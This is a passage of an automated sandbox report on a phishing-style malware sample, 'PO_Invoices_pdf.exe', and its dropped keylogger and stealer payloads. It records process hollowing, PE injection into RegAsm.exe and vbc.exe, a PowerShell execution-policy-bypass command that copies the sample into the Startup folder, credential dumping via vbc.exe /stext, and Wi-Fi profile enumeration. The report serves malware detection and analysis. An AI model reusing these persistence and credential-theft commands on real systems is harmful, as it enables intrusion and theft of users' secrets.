                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion:

                            barindex
                            .NET source code references suspicious native API functionsShow sources
                            Source: hawkgoods.exe.5.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                            Source: hawkgoods.exe.5.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                            Source: origigoods40.exe.5.dr, A/b2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                            Source: 7.0.origigoods40.exe.c30000.0.unpack, A/b2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                            Source: 7.2.origigoods40.exe.c30000.0.unpack, A/b2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                            Allocates memory in foreign processesShow sources
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                            Bypasses PowerShell execution policyShow sources
                            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Injects a PE file into a foreign processesShow sources
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                            Sample uses process hollowing techniqueShow sources
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                            Writes to foreign memory regionsShow sources
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 403000
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D12008
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 403000
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 88D008
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess created: unknown unknown
                            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Users\user\Desktop\PO_Invoices_pdf.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
